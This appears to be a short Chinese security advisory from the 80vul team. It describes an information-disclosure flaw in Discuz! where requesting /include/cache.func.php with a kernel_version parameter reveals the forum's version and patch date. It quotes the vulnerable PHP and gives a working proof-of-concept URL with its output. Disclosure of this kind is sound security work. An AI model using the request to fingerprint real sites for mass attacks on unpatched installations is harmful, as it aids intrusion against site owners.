由于Discuz!的/include/cache.func.php缺少访问限制导致版本及补丁消息的泄露.
author: 80vul-A
team:http://www.80vul.com
漏洞存在于文件/include/cache.func.php里的代码如下:
define('DISCUZ_KERNEL_VERSION', '6.1.0'); define('DISCUZ_KERNEL_RELEASE', '20080418'); if(isset($_GET['kernel_version'])) { exit('Crossday Discuz! Board<br />Developed by Comsenz Inc.<br /><br />Version: '.DISCUZ_KERNEL_VERSION.'<br />Release: '.DISCUZ_KERNEL_RELEASE); } elseif(!defined('IN_DISCUZ')) { exit('Access Denied'); }提交kernel_version的时会显示版本及补丁信息,如果攻击者结合google-hacking等技术很容易找到没有升级的程序,导致mass类攻击.
poc:
http://www.discuz.net/include/cache.func.php?kernel_version=1
显示:
Crossday Discuz! Board
Developed by Comsenz Inc.
Version: 7.0.0
Release: 20081031
[难道官方是打算1031发布7.00,不知道杂的又推迟了:(]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论